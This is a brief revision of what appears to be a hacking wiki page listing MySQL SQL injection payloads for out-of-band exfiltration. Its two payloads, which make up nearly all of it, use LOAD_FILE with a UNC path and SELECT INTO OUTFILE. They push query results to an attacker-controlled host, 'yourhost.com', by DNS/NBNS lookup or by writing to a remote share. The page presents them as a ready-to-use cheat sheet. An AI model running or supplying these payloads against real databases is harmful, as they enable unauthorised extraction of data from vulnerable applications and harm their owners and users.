hacking:sql_injection:mysql:out_of_band_channel_attacks
This is an old revision of the document!
Hacking - SQL Injection - MySQL - Out of Band Channel Attacks
Makes a NBNS query request/DNS resolution request to yourhost.com:
?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))
Writes data to your shared folder/file:
?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt')
- {INJECTION} = You want to run the query.
hacking/sql_injection/mysql/out_of_band_channel_attacks.1587077971.txt.gz · Last modified: 2020/07/15 09:30 (external edit)